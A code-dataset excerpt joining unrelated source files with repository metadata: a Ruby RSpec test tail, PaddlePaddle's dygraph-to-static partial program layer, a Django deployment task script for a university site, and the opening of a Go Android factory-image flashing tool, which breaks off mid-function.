expect(@ai.file_exists?).to be false
path = File.join(Assembly::PATH_TO_GEM, 'bogus.txt')
@ai = described_class.new(path)
expect(File.exist?(path)).to be false
expect(File.directory?(path)).to be false
expect(@ai.file_exists?).to be false
end
it 'sets attributes correctly when initializing' do
@ai = described_class.new('/some/file.txt')
expect(@ai.path).to eq('/some/file.txt')
expect(@ai.label).to be_nil
expect(@ai.file_attributes).to be_nil
expect(@ai.provider_sha1).to be_nil
expect(@ai.provider_md5).to be_nil
expect(@ai.relative_path).to be_nil
@ai = described_class.new('/some/file.txt', label: 'some label', file_attributes: { 'shelve' => 'yes', 'publish' => 'yes', 'preserve' => 'no' }, relative_path: '/tmp')
expect(@ai.path).to eq('/some/file.txt')
expect(@ai.label).to eq('some label')
expect(@ai.file_attributes).to eq('shelve' => 'yes', 'publish' => 'yes', 'preserve' => 'no')
expect(@ai.provider_sha1).to be_nil
expect(@ai.provider_md5).to be_nil
expect(@ai.relative_path).to eq('/tmp')
end
it 'sets md5_provider attribute' do
ai = described_class.new('/some/file.txt', provider_md5: 'XYZ')
expect(ai.provider_md5).to eq('XYZ')
end
it 'tells us if an input file is not an image' do
non_image_file = File.join(Assembly::PATH_TO_GEM, 'spec/object_file_spec.rb')
expect(File.exist?(non_image_file)).to be true
@ai = described_class.new(non_image_file)
expect(@ai.image?).to eq(false)
expect(@ai.object_type).not_to eq(:image)
expect(@ai.valid_image?).to eq(false)
non_image_file = File.join(Assembly::PATH_TO_GEM, 'spec/test_data/input/file_with_no_exif.xml')
expect(File.exist?(non_image_file)).to be true
@ai = described_class.new(non_image_file)
expect(@ai.image?).to eq(false)
expect(@ai.object_type).not_to eq(:image)
expect(@ai.valid_image?).to eq(false)
end
it 'tells us the size of an input file' do
expect(File.exist?(TEST_TIF_INPUT_FILE)).to be true
@ai = described_class.new(TEST_TIF_INPUT_FILE)
expect(@ai.filesize).to eq(63_542)
end
it 'tells us the mimetype and encoding of an input file' do
expect(File.exist?(TEST_TIF_INPUT_FILE)).to be true
@ai = described_class.new(TEST_TIF_INPUT_FILE)
expect(@ai.mimetype).to eq('image/tiff')
expect(@ai.file_mimetype).to eq('image/tiff')
expect(@ai.encoding).to eq('binary')
end
end
|
Ruby
|
Apache-2.0
|
sul-dlss/assembly-objectfile/spec/object_file_spec.rb
|
ebe8428c-c118-4d03-87b5-fb08a8dfb856
|
[]
|
[]
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import numpy as np
import six
import paddle
from paddle.fluid import framework, backward, core
from paddle.fluid.dygraph import layers
from paddle.fluid.dygraph.base import switch_to_static_graph
from paddle.fluid.dygraph.dygraph_to_static import logging_utils
from paddle.fluid.dygraph.dygraph_to_static.return_transformer import RETURN_NO_VALUE_MAGIC_NUM
from paddle.fluid.layers.utils import flatten
from paddle.fluid.layers.utils import pack_sequence_as
import paddle.compat as cpt
class NestSequence(object):
"""
A wrapper class that easily to flatten and restore the nest structure of
given sequence.
"""
def __init__(self, raw_input, need_check=False):
self.__raw_input = raw_input
self.__var_ids = self._get_var_ids()
self._check_non_variable(need_check)
def tolist(self):
"""
Flattens the nested sequences into single list.
"""
return flatten(self.__raw_input)
def restore(self, value_list):
"""
Restores the nested sequence from value list.
"""
assert len(self.tolist()) == len(value_list)
return pack_sequence_as(self.__raw_input, value_list)
def _get_var_ids(self):
var_ids = []
for idx, var in enumerate(self.tolist()):
if isinstance(var, (framework.Variable, core.VarBase)):
var_ids.append(idx)
return var_ids
def _check_non_variable(self, need_check):
"""
Raises warning if output of traced function contains non-tensor type values.
"""
if need_check:
warning_types = set()
for var in self.tolist():
if not isinstance(var, (framework.Variable, core.VarBase)):
warning_types.add(type(var))
if warning_types:
logging_utils.warn(
"Output of traced function contains non-tensor type values: {}. "
"Currently, We don't support to update them while training and will return "
"what we first saw. Please try to return them as tensor.".
format(list(warning_types)))
@property
def var_ids(self):
return self.__var_ids
def __getitem__(self, item):
return self.tolist()[item]
class LazyInitialized(object):
"""
Descriptor to implement lazy initialization of property.
"""
def __init__(self, function):
self.function = function
def __get__(self, instance, cls):
val = self.function(instance)
setattr(instance, self.function.__name__, val)
return val
def _change_is_test_status(program, is_test):
# change all `is_test` attributes
for block in program.blocks:
for op in block.ops:
if op.has_attr('is_test'):
op._set_attr('is_test', is_test)
return program
class PartialProgramLayer(layers.Layer):
"""
PartialProgramLayer wraps all the ops from layers decorated by `@declarative`
and execute them as a static subgraph.
.. note::
**1. This is a very low level API. Users should not use this API
directly. Please use `partial_program_from(concrete_program)`
to create it.
**2. LoDTensorArray is not currently supported in the output.
Args:
main_program(Program): The main program that contains ops need to be executed.
inputs(list[Variable]): The input list of the decorated function by `@declarative`.
outputs(list[Variable]): The output list of the decorated function by `@declarative`.
parameters(list[VarBase]|None): All trainable parameters included in the program. Default None.
Returns:
Layer: A Layer object that run all ops internally in static mode.
"""
def __init__(self, main_program, inputs, outputs, parameters=None):
super(PartialProgramLayer, self).__init__()
self._inputs = NestSequence(inputs)
self._outputs = NestSequence(outputs, need_check=True)
self._params = parameters if parameters is not None else []
self._origin_main_program = self._verify_program(main_program)
self._inner_scope = core.Scope()
# Set default mode to train
self._double_grads = self._get_double_grads(self._origin_main_program)
self.training = True
@LazyInitialized
def _infer_program(self):
"""
Lazy initialized property of infer_program.
"""
return self._clone_for_test(self._origin_main_program)
@LazyInitialized
def _train_program(self):
"""
Lazy initialized property of train_program.
"""
train_program = self._append_backward_desc(self._origin_main_program)
# Note: Only set grad type once after initializing train program. So we
# put it here.
self._set_grad_type(self._params, train_program)
return train_program
def _verify_program(self, main_program):
"""
Verify that the program parameter is initialized, prune some unused params,
and remove redundant op callstack.
"""
# 1. Check all params from main program can be found in self._params
self._check_params_all_inited(main_program)
# 2. Prune the parameters not used anywhere in the program.
self._prune_unused_params(main_program)
return main_program
@switch_to_static_graph
def _append_backward_desc(self, main_program):
# make sure all status of is_test are False in train mode.
program = _change_is_test_status(main_program.clone(), is_test=False)
targets = []
for out in self._outputs.tolist():
if isinstance(out, framework.Variable):
targets.append(program.global_block().var(out.name))
if targets and self._params:
backward.gradients(targets=targets, inputs=[])
return program
def _prune_unused_params(self, program):
"""
Prune the parameters not used anywhere in the program.
The `@declarative` may only decorated a sub function which
contains some unused parameters created in `__init__`.
So prune these parameters to avoid unnecessary operations in
`run_program_op`.
"""
required_params = []
for param in self._params:
found_param = False
for block in program.blocks:
for op in block.ops:
if param.name in op.input_arg_names or param.name in op.output_arg_names:
required_params.append(param)
found_param = True
break
if found_param:
break
self._params = required_params
def _get_double_grads(self, program):
double_grads = []
for block in program.blocks:
for name in block.vars:
if "@GRAD" in name:
var_desc = block.vars[name].desc
var_base = core.VarBase(var_desc.dtype(),
var_desc.shape(),
var_desc.name(),
var_desc.type(), False)
double_grads.append(var_base)
return double_grads
def forward(self, inputs):
in_vars, out_vars, tmp_scope_vec = self._prepare(inputs)
attrs = ('global_block', self.program.desc.block(0), 'start_op_index',
0, 'end_op_index', self._infer_program.desc.block(0).op_size(),
'is_test', not self.training)
core.ops.run_program(
valid_vars(in_vars),
valid_vars(self._params),
valid_vars(out_vars), tmp_scope_vec,
valid_vars(self._double_grads), *attrs)
restored_nest_out = self._restore_out(out_vars)
return self._remove_no_value(restored_nest_out)
@property
def program(self):
return self._train_program if self.training else self._infer_program
def _prepare(self, inputs):
"""
Prepare inputs, outputs, attrs.
"""
assert isinstance(inputs, (tuple, list))
# Flatten inputs with nested structure into single list.
flatten_inputs = flatten(inputs)
# Convert variable into VarBase and feed in training data.
input_vars = []
for i, value in enumerate(flatten_inputs):
if isinstance(value, np.ndarray):
var = core.VarBase(
value=value,
name=self._inputs[i].desc.name(),
persistable=False,
place=framework._current_expected_place(),
zero_copy=True)
elif isinstance(value, core.VarBase):
value.name = self._inputs[i].desc.name()
if value.stop_gradient:
# NOTE(Aurelius84): If var is on CPUPlace, it will be transformed multi times
# into CUDAPlace when it's as input of multi Ops. so we move it in advance
# to avoid this problem.
var = paddle.to_tensor(
value,
dtype=value.dtype,
place=framework._current_expected_place(),
stop_gradient=True)
var.name = value.name
else:
var = value
else:
continue
input_vars.append(var)
# Create VarBase to receive output data.
out_vars = []
for idx in self._outputs.var_ids:
var = self._outputs[idx]
assert isinstance(var, framework.Variable)
var_desc = var.desc
var_base = core.VarBase(var_desc.dtype(),
var_desc.shape(),
var_desc.name(), var_desc.type(), False)
out_vars.append(var_base)
# Hold forward variables
tmp_scope_vec = core.VarBase(core.VarDesc.VarType.FP32, [],
"program_out_scope",
core.VarDesc.VarType.STEP_SCOPES, True)
tmp_scope_vec.value().set_scope(self._inner_scope)
return input_vars, out_vars, tmp_scope_vec
def _restore_out(self, out_vars):
"""
Restores same nested outputs by only replacing the Variable with VarBase.
"""
flatten_outputs = self._outputs.tolist()
for i, idx in enumerate(self._outputs.var_ids):
flatten_outputs[idx] = out_vars[i]
outs = self._outputs.restore(flatten_outputs)
if outs is not None and len(outs) == 1:
outs = outs[0]
return outs
@switch_to_static_graph
def _clone_for_test(self, main_program):
return main_program.clone(for_test=True)
def _is_no_value(self, var):
if isinstance(var, core.VarBase):
if var.shape == [1] and var.numpy()[0] == RETURN_NO_VALUE_MAGIC_NUM:
return True
return False
def _remove_no_value(self, out_vars):
"""
Removes invalid value for various-length return statement
"""
if isinstance(out_vars, core.VarBase):
if self._is_no_value(out_vars):
return None
return out_vars
elif isinstance(out_vars, (tuple, list)):
if isinstance(out_vars, tuple):
res = tuple(
var for var in out_vars if not self._is_no_value(var))
else:
# isinstance(out_vars, list)
res = [var for var in out_vars if not self._is_no_value(var)]
has_removed = (len(out_vars) > len(res))
# len(out_vars) > len(res) means we have removed var. This is
# preventing out_vars is empty or just one element at the beginning
if len(res) == 0 and has_removed:
return None
elif len(res) == 1 and has_removed:
return res[0]
return res
return out_vars
def _set_grad_type(self, params, train_program):
# NOTE: if user set sparse gradient mode, the param's gradient
# will be SelectedRows, not LoDTensor. But tracer will just
# set param grad VarBase by forward VarBase(LoDTensor)
# If we don't change grad_var type here, RunProgramOp need
# transform SelectedRows to LoDTensor forcibly, it may not
# be user wanted result.
for param in params:
grad_name = param.name + core.grad_var_suffix()
grad_var = train_program.desc.block(0).find_var(
cpt.to_bytes(grad_name))
# NOTE: cannot find var desc maybe no problem, such as in batch_norm
if grad_var is None:
continue
param._set_grad_type(grad_var.type())
def _remove_op_call_stack(self, main_program):
"""
Remove op's python call stack with redundant low-level error messages related to
transforamtions to avoid confusing users.
"""
assert isinstance(main_program, framework.Program)
for block in main_program.blocks:
for op in block.ops:
if op.has_attr("op_callstack"):
op._remove_attr("op_callstack")
return main_program
def _check_params_all_inited(self, main_program):
"""
Check all params from main program are already initialized, see details as follows:
1. all parameters in self._params should be type `framework.ParamBase` which are created in dygraph.
2. all parameters from transformed program can be found in self._params.
Because they share same data with ParamBase of original dygraph.
"""
if not isinstance(self._params, (list, tuple)):
raise TypeError(
"Type of self._params in PartialProgramLayer should be list or tuple, but received %s."
% type(self._params))
param_and_buffer_names_set = set()
for i, var in enumerate(self._params):
# self._params constains parameters and buffers with persistable=True.
if not isinstance(var, core.VarBase):
raise TypeError(
'Type of self._params[{}] in PartialProgramLayer should be Parameter or Variable, but received {}.'.
format(i, type(var)))
param_and_buffer_names_set.add(var.name)
for block in main_program.blocks:
for name, var in six.iteritems(block.vars):
if isinstance(var, framework.Parameter):
if name not in param_and_buffer_names_set:
raise ValueError(
"\n\tWe don't support to define layer with parameters in the function "
"decorated by `@declarative`.\n\tBecause that will re-defined parameters "
"every time when you run the function.\n\t"
"But we found parameter(%s) was created in the decorated function.\n\t"
"Please define the layer with parameters in `__init__` function."
% name)
def valid_vars(vars):
"""
Note: run_program_op.InferShape requires `X`/'Out' not be null.
But it's common in dy2static, fake varBase is created to handle the
problem.
"""
if vars:
return vars
return [
core.VarBase(
value=[1],
name='Fake_var',
place=framework._current_expected_place())
]
def partial_program_from(concrete_program):
inputs = concrete_program.inputs
if inputs and isinstance(inputs[0], layers.Layer):
inputs = inputs[1:]
return PartialProgramLayer(concrete_program.main_program, inputs,
concrete_program.outputs,
concrete_program.parameters)
|
Python
|
Apache-2.0
|
CheQiXiao/Paddle/python/paddle/fluid/dygraph/dygraph_to_static/partial_program.py
|
425a3eb8-8de0-4331-9a0f-ba6f17555079
|
[{"tag": "USERNAME", "value": "Aurelius84", "start": 9625, "end": 9635, "context": "f value.stop_gradient:\n # NOTE(Aurelius84): If var is on CPUPlace, it will be transformed m"}]
|
[{"tag": "USERNAME", "value": "Aurelius84", "start": 9625, "end": 9635, "context": "f value.stop_gradient:\n # NOTE(Aurelius84): If var is on CPUPlace, it will be transformed m"}]
|
import requests
import json
import datetime
import os
import io
from invoke import task
from .invoke_utils import ServerConnection, use_dump_modifier_function
RAJK_PASSWORD = os.environ.get("RAJK_PASSWORD")
RAJK_RSA = os.environ.get("RAJK_RSA")
TEST_DEPLOY_DIRECTORY = os.getcwd() + "/build"
rajk_server_connection = ServerConnection(
"rajk", "146.110.60.20", 2222, "/var/www/rajkdjango2/bin/python"
)
def redo_rsa_from_text(c, rsa_text):
os.makedirs("{}/.ssh".format(os.path.expanduser("~")), exist_ok=True)
rsa_path = "{}/.ssh/id_rsa".format(os.path.expanduser("~"))
with open(rsa_path, "w") as fp:
fp.write(rsa_text)
c.run("chmod 600 {}".format(rsa_path))
@task
def backup_django(c):
os.makedirs("backups", exist_ok=True)
bup_dir = os.path.join("backups", datetime.date.today().isoformat())
c.run("mkdir {}".format(bup_dir))
scp_command = rajk_server_connection.copy_from_server_command(
bup_dir, "/var/www/rajkdjango2"
)
c.run(scp_command)
@task
def restart_server(c):
command = rajk_server_connection.run_sudo_command(
"service django2 restart", RAJK_PASSWORD
)
c.run(command)
@task
def stop_server(c):
command = rajk_server_connection.run_sudo_command(
"service django2 stop", RAJK_PASSWORD
)
c.run(command)
@task
def start_server(c):
command = rajk_server_connection.run_sudo_command(
"service django2 start", RAJK_PASSWORD
)
c.run(command)
@task
def dump(c, fname="dump.json", no_contenttypes=False):
py_command = "/var/www/rajkdjango2/manage.py dumpdata {}".format(
"-e contenttypes" if no_contenttypes else ""
)
command = rajk_server_connection.remote_python_command(py_command)
c.run(command + " > {}".format(fname))
@task
def remote_dump(c, no_contenttypes=True):
py_command = "/var/www/rajkdjango2/manage.py dumpdata {} > /var/www/rajk/djangodump.json".format(
"-e contenttypes" if no_contenttypes else ""
)
command = rajk_server_connection.remote_python_command(py_command)
c.run(command)
@task
def setup_test_deploy_env(c):
c.run("rm -rf ./{}".format(TEST_DEPLOY_DIRECTORY))
c.run("mkdir {}".format(TEST_DEPLOY_DIRECTORY))
resp = requests.get("https://api.github.com/orgs/rajk-apps/repos")
repos = [
"git+https://github.com/{}".format(d["full_name"])
for d in json.loads(resp.content)
]
app_names = [r.split("/")[-1].replace("-", "_") for r in repos]
c.run("python3 -m venv {}/django_venv".format(TEST_DEPLOY_DIRECTORY))
for r in ["wheel", "django", "toml"] + repos:
c.run("{}/django_venv/bin/pip install {}".format(TEST_DEPLOY_DIRECTORY, r))
c.run(
"cd {};django_venv/bin/django-admin startproject rajkproject".format(
TEST_DEPLOY_DIRECTORY
)
)
with open(
"{}/rajkproject/rajkproject/settings.py".format(TEST_DEPLOY_DIRECTORY), "a"
) as fp:
fp.write(
"\nINSTALLED_APPS += [{}]".format(
", ".join(["'{}'".format(a) for a in app_names])
)
)
with open(
"{}/rajkproject/rajkproject/urls.py".format(TEST_DEPLOY_DIRECTORY), "a"
) as fp:
fp.write(
"\nfrom django.urls import include"
"\nurlpatterns.append(path('accounts/', include('django.contrib.auth.urls')))"
"\nurlpatterns += [{}]".format(
", ".join(
[
"path('{}', include('{}.urls'))".format(
a + "/" if a != "rajk_appman" else "", a
)
for a in app_names
]
)
)
)
dump_fname = "{}/dump.json".format(TEST_DEPLOY_DIRECTORY)
resp = requests.get("https://rajk.uni-corvinus.hu/djangodump.json")
with open(dump_fname, "wb") as fp:
fp.write(resp.content)
for django_command in [
"makemigrations",
"makemigrations {}".format(" ".join(app_names)),
"migrate",
"loaddata {}".format(dump_fname),
]:
c.run(
"{}/django_venv/bin/python {}/rajkproject/manage.py {}".format(
TEST_DEPLOY_DIRECTORY, TEST_DEPLOY_DIRECTORY, django_command
)
)
@task
def deploy(c, dump_modifier_function=None, live=False, redo_rsa=False):
f = io.StringIO()
c.run(
"{}/django_venv/bin/python setup.py --fullname".format(TEST_DEPLOY_DIRECTORY),
out_stream=f,
)
current_app_fullname = f.getvalue().strip()
f.close()
c.run("{}/django_venv/bin/python setup.py sdist".format(TEST_DEPLOY_DIRECTORY))
local_tarball = "./dist/{}.tar.gz".format(current_app_fullname)
c.run(
"{}/django_venv/bin/pip install {}".format(TEST_DEPLOY_DIRECTORY, local_tarball)
)
dump_fname = "{}/dump.json".format(TEST_DEPLOY_DIRECTORY)
resp = requests.get("https://rajk.uni-corvinus.hu/djangodump.json")
with open(dump_fname, "wb") as fp:
fp.write(resp.content)
if dump_modifier_function is not None:
use_dump_modifier_function(dump_modifier_function, dump_fname)
c.run("rm {}/rajkproject/db.sqlite3".format(TEST_DEPLOY_DIRECTORY))
for django_command in [
"makemigrations",
"makemigrations {}".format(current_app_fullname.split("-")[0]),
"migrate",
"loaddata {}".format(dump_fname)
]:
c.run(
"{}/django_venv/bin/python {}/rajkproject/manage.py {}".format(
TEST_DEPLOY_DIRECTORY, TEST_DEPLOY_DIRECTORY, django_command
)
)
if live:
_live_deploy(c, local_tarball, current_app_fullname, dump_modifier_function, redo_rsa)
def _live_deploy(c, local_tarball, current_app_fullname, dump_modifier_function=None, redo_rsa=False):
if redo_rsa:
if RAJK_RSA:
redo_rsa_from_text(c, RAJK_RSA)
else:
raise EnvironmentError("No RAJK_RSA env variable")
local_dump_fname = "{}/deploy_dump.json".format(TEST_DEPLOY_DIRECTORY)
remote_dump_fname = "/var/www/rajkdjango2/deploy_dump.json"
print("stopping server")
stop_server(c)
print("dumping data")
dump(c, local_dump_fname, True)
if dump_modifier_function is not None:
use_dump_modifier_function(dump_modifier_function, local_dump_fname)
scp_command = rajk_server_connection.copy_to_server_command(
local_dump_fname, remote_dump_fname
)
c.run(scp_command)
remote_tarball = "/var/www/rajkdjango2/tarballs/{}".format(
local_tarball.split("/")[-1]
)
tar_scp_command = rajk_server_connection.copy_to_server_command(
local_tarball, remote_tarball
)
c.run(tar_scp_command)
install_command = "/var/www/rajkdjango2/bin/pip --no-cache-dir install --upgrade {}".format(
remote_tarball
)
remote_install_command = rajk_server_connection.run_ssh_command(install_command)
c.run(remote_install_command)
c.run(rajk_server_connection.run_ssh_command("rm /var/www/rajkdjango2/db.sqlite3"))
for django_command in [
"makemigrations",
"makemigrations {}".format(current_app_fullname.split("-")[0]),
"migrate",
"loaddata {}".format(remote_dump_fname),
]:
c.run(
rajk_server_connection.remote_python_command(
"/var/www/rajkdjango2/manage.py {}".format(django_command)
)
)
start_server(c)
|
Python
|
MIT
|
rajk-apps/rajk-appman/rajk_appman/invoke_rajk.py
|
dc826086-585f-4fd9-8cb1-7c456e74e168
|
[{"tag": "USERNAME", "value": "rajk", "start": 345, "end": 349, "context": "\n\nrajk_server_connection = ServerConnection(\n \"rajk\", \"146.110.60.20\", 2222, \"/var/www/rajkdjango2/bi"}, {"tag": "IP_ADDRESS", "value": "146.110.60.20", "start": 353, "end": 366, "context": "erver_connection = ServerConnection(\n \"rajk\", \"146.110.60.20\", 2222, \"/var/www/rajkdjango2/bin/python\"\n)\n\n\ndef"}]
|
[{"tag": "USERNAME", "value": "rajk", "start": 345, "end": 349, "context": "\n\nrajk_server_connection = ServerConnection(\n \"rajk\", \"146.110.60.20\", 2222, \"/var/www/rajkdjango2/bi"}, {"tag": "IP_ADDRESS", "value": "146.110.60.20", "start": 353, "end": 366, "context": "erver_connection = ServerConnection(\n \"rajk\", \"146.110.60.20\", 2222, \"/var/www/rajkdjango2/bin/python\"\n)\n\n\ndef"}]
|
// Copyright 2020 CIS Maxwell, LLC. All rights reserved.
// Copyright 2020 The Calyx Institute
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"archive/zip"
"crypto/sha256"
"encoding/hex"
"errors"
"fmt"
"io"
"io/ioutil"
"math"
"net/http"
"os"
"os/exec"
"path"
"path/filepath"
"runtime"
"strings"
"sync"
"time"
)
var input string
var executable, _ = os.Executable()
var cwd = filepath.Dir(executable)
var adb *exec.Cmd
var fastboot *exec.Cmd
var platformToolsVersion = "30.0.4"
var platformToolsZip string
var deviceFactoryFolderMap map[string]string
// Set via LDFLAGS, check Makefile
var version string
const OS = runtime.GOOS
const (
UDEV_RULES = "# Google\nSUBSYSTEM==\"usb\", ATTR{idVendor}==\"18d1\", GROUP=\"sudo\"\n# Xiaomi\nSUBSYSTEM==\"usb\", ATTR{idVendor}==\"2717\", GROUP=\"sudo\"\n"
RULES_FILE = "98-device-flasher.rules"
RULES_PATH = "/etc/udev/rules.d/"
)
var (
Error = Red
Warn = Yellow
)
var (
Blue = Color("\033[1;34m%s\033[0m")
Red = Color("\033[1;31m%s\033[0m")
Yellow = Color("\033[1;33m%s\033[0m")
)
func Color(color string) func(...interface{}) string {
return func(args ...interface{}) string {
return fmt.Sprintf(color,
fmt.Sprint(args...))
}
}
func errorln(err interface{}, fatal bool) {
log, _ := os.OpenFile("error.log", os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0666)
_, _ = fmt.Fprintln(log, err)
_, _ = fmt.Fprintln(os.Stderr, Error(err))
log.Close()
if fatal {
cleanup()
fmt.Println("Press enter to exit.")
_, _ = fmt.Scanln(&input)
os.Exit(1)
}
}
func warnln(warning interface{}) {
fmt.Println(Warn(warning))
}
func cleanup() {
if OS == "linux" {
_, err := os.Stat(RULES_PATH + RULES_FILE)
if !os.IsNotExist(err) {
_ = exec.Command("sudo", "rm", RULES_PATH+RULES_FILE).Run()
}
}
}
func main() {
defer cleanup()
_ = os.Remove("error.log")
fmt.Println("Android Factory Image Flasher version " + version)
// Map device codenames to their corresponding extracted factory image folders
deviceFactoryFolderMap = getFactoryFolders()
if len(deviceFactoryFolderMap) < 1 {
errorln(errors.New("Cannot continue without a device factory image. Exiting..."), true)
}
err := getPlatformTools()
if err != nil {
errorln("Cannot continue without Android platform tools. Exiting...", false)
errorln(err, true)
}
if OS == "linux" {
// Linux weirdness
checkUdevRules()
}
platformToolCommand := *adb
platformToolCommand.Args = append(adb.Args, "start-server")
err = platformToolCommand.Run()
if err != nil {
errorln("Cannot start ADB server", false)
errorln(err, true)
}
warnln("1. Connect to a wifi network and ensure that no SIM cards are installed")
warnln("2. Enable Developer Options on device (Settings -> About Phone -> tap \"Build number\" 7 times)")
warnln("3. Enable USB debugging on device (Settings -> System -> Advanced -> Developer Options) and allow the computer to debug (hit \"OK\" on the popup when USB is connected)")
warnln("4. Enable OEM Unlocking (in the same Developer Options menu)")
fmt.Println()
fmt.Print(Warn("Press ENTER to continue"))
_, _ = fmt.Scanln(&input)
fmt.Println()
// Map serial numbers to device codenames by extracting them from adb and fastboot command output
devices := getDevices()
if len(devices) == 0 {
errorln(errors.New("No devices to be flashed. Exiting..."), true)
} else if !PARALLEL && len(devices) > 1 {
errorln(errors.New("More than one device detected. Exiting..."), true)
}
fmt.Println()
fmt.Println("Devices to be flashed: ")
for serialNumber, device := range devices {
fmt.Println(device + " " + serialNumber)
}
fmt.Println()
fmt.Print(Warn("Press ENTER to continue"))
_, _ = fmt.Scanln(&input)
// Sequence: unlock bootloader -> execute flash-all script -> relock bootloader
flashDevices(devices)
}
func getFactoryFolders() map[string]string {
files, err := ioutil.ReadDir(cwd)
if err != nil {
errorln(err, true)
}
deviceFactoryFolderMap := map[string]string{}
for _, file := range files {
file := file.Name()
if strings.Contains(file, "factory") && strings.HasSuffix(file, ".zip") {
if strings.HasPrefix(file, "jasmine") {
platformToolsVersion = "29.0.6"
}
extracted, err := extractZip(path.Base(file), cwd)
if err != nil {
errorln("Cannot continue without a factory image. Exiting...", false)
errorln(err, true)
}
device := strings.Split(file, "-")[0]
if _, exists := deviceFactoryFolderMap[device]; !exists {
deviceFactoryFolderMap[device] = extracted[0]
} else {
errorln("More than one factory image available for "+device, true)
}
}
}
return deviceFactoryFolderMap
}
func getPlatformTools() error {
plaformToolsUrlMap := map[[2]string]string{
[2]string{"darwin", "29.0.6"}: "https://dl.google.com/android/repository/platform-tools_r29.0.6-darwin.zip",
[2]string{"linux", "29.0.6"}: "https://dl.google.com/android/repository/platform-tools_r29.0.6-linux.zip",
[2]string{"windows", "29.0.6"}: "https://dl.google.com/android/repository/platform-tools_r29.0.6-windows.zip",
[2]string{"darwin", "30.0.4"}: "https://dl.google.com/android/repository/fbad467867e935dce68a0296b00e6d1e76f15b15.platform-tools_r30.0.4-darwin.zip",
[2]string{"linux", "30.0.4"}: "https://dl.google.com/android/repository/platform-tools_r30.0.4-linux.zip",
[2]string{"windows", "30.0.4"}: "https://dl.google.com/android/repository/platform-tools_r30.0.4-windows.zip",
}
platformToolsChecksumMap := map[[2]string]string{
[2]string{"darwin", "29.0.6"}: "7555e8e24958cae4cfd197135950359b9fe8373d4862a03677f089d215119a3a",
[2]string{"linux", "29.0.6"}: "cc9e9d0224d1a917bad71fe12d209dfffe9ce43395e048ab2f07dcfc21101d44",
[2]string{"windows", "29.0.6"}: "247210e3c12453545f8e1f76e55de3559c03f2d785487b2e4ac00fe9698a039c",
[2]string{"darwin", "30.0.4"}: "e0db2bdc784c41847f854d6608e91597ebc3cef66686f647125f5a046068a890",
[2]string{"linux", "30.0.4"}: "5be24ed897c7e061ba800bfa7b9ebb4b0f8958cc062f4b2202701e02f2725891",
[2]string{"windows", "30.0.4"}: "413182fff6c5957911e231b9e97e6be4fc6a539035e3dfb580b5c54bd5950fee",
}
platformToolsOsVersion := [2]string{OS, platformToolsVersion}
_, err := os.Stat(path.Base(plaformToolsUrlMap[platformToolsOsVersion]))
if err != nil {
err = downloadFile(plaformToolsUrlMap[platformToolsOsVersion])
if err != nil {
return err
}
}
platformToolsZip = path.Base(plaformToolsUrlMap[platformToolsOsVersion])
err = verifyZip(platformToolsZip, platformToolsChecksumMap[platformToolsOsVersion])
if err != nil {
fmt.Println(platformToolsZip + " checksum verification failed")
return err
}
platformToolsPath := cwd + string(os.PathSeparator) + "platform-tools" + string(os.PathSeparator)
pathEnvironmentVariable := func() string {
if OS == "windows" {
return "Path"
} else {
return "PATH"
}
}()
_ = os.Setenv(pathEnvironmentVariable, platformToolsPath+string(os.PathListSeparator)+os.Getenv(pathEnvironmentVariable))
adbPath := platformToolsPath + "adb"
fastbootPath := platformToolsPath + "fastboot"
if OS == "windows" {
adbPath += ".exe"
fastbootPath += ".exe"
}
adb = exec.Command(adbPath)
fastboot = exec.Command(fastbootPath)
// Ensure that no platform tools are running before attempting to overwrite them
killPlatformTools()
_, err = extractZip(platformToolsZip, cwd)
return err
}
func checkUdevRules() {
_, err := os.Stat(RULES_PATH)
if os.IsNotExist(err) {
err = exec.Command("sudo", "mkdir", RULES_PATH).Run()
if err != nil {
errorln("Cannot continue without udev rules. Exiting...", false)
errorln(err, true)
}
}
_, err = os.Stat(RULES_FILE)
if os.IsNotExist(err) {
err = ioutil.WriteFile(RULES_FILE, []byte(UDEV_RULES), 0644)
if err != nil {
errorln("Cannot continue without udev rules. Exiting...", false)
errorln(err, true)
}
err = exec.Command("sudo", "cp", RULES_FILE, RULES_PATH).Run()
if err != nil {
errorln("Cannot continue without udev rules. Exiting...", false)
errorln(err, true)
}
_ = exec.Command("sudo", "udevadm", "control", "--reload-rules").Run()
_ = exec.Command("sudo", "udevadm", "trigger").Run()
}
}
func getDevices() map[string]string {
devices := map[string]string{}
for _, platformToolCommand := range []exec.Cmd{*adb, *fastboot} {
platformToolCommand.Args = append(platformToolCommand.Args, "devices")
output, _ := platformToolCommand.Output()
lines := strings.Split(string(output), "\n")
if platformToolCommand.Path == adb.Path {
lines = lines[1:]
}
for i, device := range lines {
if lines[i] != "" && lines[i] != "\r" {
serialNumber := strings.Split(device, "\t")[0]
if platformToolCommand.Path == adb.Path {
device = getProp("ro.product.device", serialNumber)
} else if platformToolCommand.Path == fastboot.Path {
device = getVar("product", serialNumber)
if device == "jasmine" {
device += "_sprout"
}
}
fmt.Print("Detected " + device + " " + serialNumber)
if _, ok := deviceFactoryFolderMap[device]; ok {
devices[serialNumber] = device
fmt.Println()
} else {
fmt.Println(". " + "No matching factory image found")
}
}
}
}
return devices
}
func getVar(prop string, device string) string {
platformToolCommand := *fastboot
platformToolCommand.Args = append(fastboot.Args, "-s", device, "getvar", prop)
out, err := platformToolCommand.CombinedOutput()
if err != nil {
return ""
}
lines := strings.Split(string(out), "\n")
for _, line := range lines {
if strings.Contains(line, prop) {
return strings.Trim(strings.Split(line, " ")[1], "\r")
}
}
return ""
}
func getProp(prop string, device string) string {
platformToolCommand := *adb
platformToolCommand.Args = append(adb.Args, "-s", device, "shell", "getprop", prop)
out, err := platformToolCommand.Output()
if err != nil {
return ""
}
